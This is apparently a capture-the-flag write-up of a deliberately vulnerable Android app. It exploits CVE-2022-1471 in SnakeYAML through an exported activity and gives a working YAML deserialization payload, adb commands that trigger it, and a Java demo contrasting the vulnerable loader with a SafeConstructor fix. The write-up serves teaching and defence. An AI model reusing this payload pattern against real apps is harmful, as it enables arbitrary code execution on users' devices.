Config Editor

  1. Install the app and open it. It has a text field whose contents can be saved to a YAML file; its second feature loads a YAML file from storage.

  2. Let's examine AndroidManifest.xml:

  3. MainActivity is exported and carries an intent filter with the VIEW action, the BROWSABLE category and three data schemes: file, http and https. That is what lets the user load and save YAML files, but it also means any other app on the device, or a link opened in the browser, can hand MainActivity an arbitrary URI to open.

  4. Analysing MainActivity turns up three interesting methods:

    1. loadYaml(): opens the file at the given URI, reads it as an input stream and parses the YAML content into an object.

    2. saveYaml(): converts the text from the input field into bytes and writes them to a YAML file at the specified URI.

    3. handleIntent(): processes incoming intents that carry a URI and, if the URI is valid, passes it straight to loadYaml(). So the file content reaches the YAML parser without any check on where the URI came from.

  5. The YAML parsing is done with the SnakeYAML library, which is affected by CVE-2022-1471:

    1. a deserialization vulnerability in versions before 2.0 that allows remote code execution when the library is used to parse untrusted input;

    2. the default Constructor lets a YAML document instantiate arbitrary Java classes through global tags of the form !!fully.qualified.ClassName, which is why the library is described as "insecure by default" for untrusted data.

  6. The app ships a class named LegacyCommandUtil that runs arbitrary shell commands from within the app. It can be instantiated with the command to run as its single argument, which is exactly what the payload below relies on.

  7. Combining the two: a YAML file that tags a node with the LegacyCommandUtil class gets that class instantiated, with our string as the command, while loadYaml() is still parsing it. The command runs inside the app's process, as the uid of com.mobilehackinglab.configeditor.

  8. Exploitation strategy:

    1. Craft a malicious YAML file that triggers code execution as soon as the app opens it. Create exploit.yml containing the payload below: the global tag names the class to instantiate and the one-element sequence becomes the single constructor argument.

      1. RCE by kero: !!com.mobilehackinglab.configeditor.LegacyCommandUtil ["touch /data/data/com.mobilehackinglab.configeditor/kero.txt"]

      2. Push the file to external storage, e.g. adb push exploit.yml /sdcard/Download/

    2. Then use the adb command below to make the app load the file from external storage (/sdcard/Download):

    3. adb shell am start -n com.mobilehackinglab.configeditor/.MainActivity -a android.intent.action.VIEW -d "file:///sdcard/Download/exploit.yml"

    4. To confirm, check that /data/data/com.mobilehackinglab.configeditor/kero.txt now exists (with adb shell run-as com.mobilehackinglab.configeditor ls on a debuggable build, or from a root shell). Its presence proves the touch command ran inside the app's process.
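To show why the tag in the payload reaches a constructor, and what the fix looks like, here is an added example; it is not the challenge app's decompiled code and not from Mobile Hacking Lab. It contains a stand-in LegacyCommandUtil with the one-argument constructor the payload implies, the loadYaml() pattern the writeup describes (the default Yaml() constructor), and the same method hardened with SafeConstructor. All names other than LegacyCommandUtil and loadYaml are hypothetical; it assumes SnakeYAML 1.33 on the classpath and a POSIX sh, and the only side effect is a marker file in the JVM temp directory.

```java
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class ConfigEditorDemo {

    // Stand-in for the gadget class found in the app. Assumed shape: a public one-argument
    // constructor that hands its argument to a shell. Not the app's real source.
    public static class LegacyCommandUtil {
        public LegacyCommandUtil(String command) throws IOException {
            Runtime.getRuntime().exec(new String[] {"sh", "-c", command});
        }
    }

    // Vulnerable loader, the pattern the writeup describes for loadYaml(): new Yaml() uses
    // org.yaml.snakeyaml.constructor.Constructor, which honours global tags. A node tagged
    // !!some.Class is instantiated, and a sequence under that tag is matched against a
    // constructor with the same number of parameters, so ["cmd"] calls LegacyCommandUtil(String).
    static Object loadYamlVulnerable(InputStream in) {
        Yaml yaml = new Yaml();
        return yaml.load(in);
    }

    // Hardened loader: SafeConstructor only builds the core YAML types (scalars, lists, maps)
    // and throws on any global tag, so the same payload never reaches a class constructor.
    static Object loadYamlSafe(InputStream in) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(in);
    }

    static InputStream asStream(String yamlText) {
        return new ByteArrayInputStream(yamlText.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws Exception {
        // Constructed payload with the same shape as the writeup's exploit.yml, but pointing
        // the tag at the demo class above and touching a marker file in the JVM temp directory.
        File marker = new File(System.getProperty("java.io.tmpdir"), "kero.txt");
        marker.delete();
        String payload = "RCE by demo: !!" + LegacyCommandUtil.class.getName()
                + " [\"touch " + marker.getAbsolutePath() + "\"]\n";

        // 1. Default Constructor: the command runs during load(), before the caller ever
        //    looks at the returned object (a map whose value is the LegacyCommandUtil instance).
        Object parsed = loadYamlVulnerable(asStream(payload));
        Thread.sleep(500); // exec() is asynchronous; give the shell a moment to create the file
        System.out.println("vulnerable loader returned " + parsed.getClass().getSimpleName()
                + "; marker exists: " + marker.exists());

        // 2. SafeConstructor: the global tag is rejected and nothing is instantiated.
        marker.delete();
        try {
            loadYamlSafe(asStream(payload));
            System.out.println("unexpected: safe loader accepted the payload");
        } catch (YAMLException e) {
            System.out.println("safe loader rejected payload: " + e.getMessage().split("\n")[0]);
        }
        System.out.println("marker exists after safe load: " + marker.exists());
    }
}
```

Compile and run with the SnakeYAML jar on the classpath (javac -cp snakeyaml-1.33.jar ConfigEditorDemo.java, then java -cp snakeyaml-1.33.jar:. ConfigEditorDemo). The first loader creates the marker, the second throws before any class is instantiated. For the real app the fix is the same: parse untrusted files with SafeConstructor, or move to SnakeYAML 2.x, where the default loader refuses global tags unless a TagInspector explicitly allows them.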
